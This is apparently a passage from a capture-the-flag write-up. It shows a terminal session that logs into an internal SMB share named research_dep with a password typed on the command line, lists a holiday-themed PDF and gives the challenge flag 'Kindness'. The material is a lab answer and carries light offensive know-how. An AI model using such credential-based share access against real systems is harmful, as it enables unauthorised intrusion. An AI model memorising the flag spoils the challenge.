rncztspfgz@grades:~/bh$ smbclient //10.128.3.30/research_dep Iylbegxmf#
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Dec 2 16:39:42 2021
.. D 0 Fri Jan 7 08:01:37 2022
SantaSecretToAWonderfulHolidaySeason.pdf N 173932 Thu Dec 2 16:38:26 2021
41089256 blocks of size 1024. 34736208 blocks available
In that PDF, I’ll find the flag:
Flag: Kindness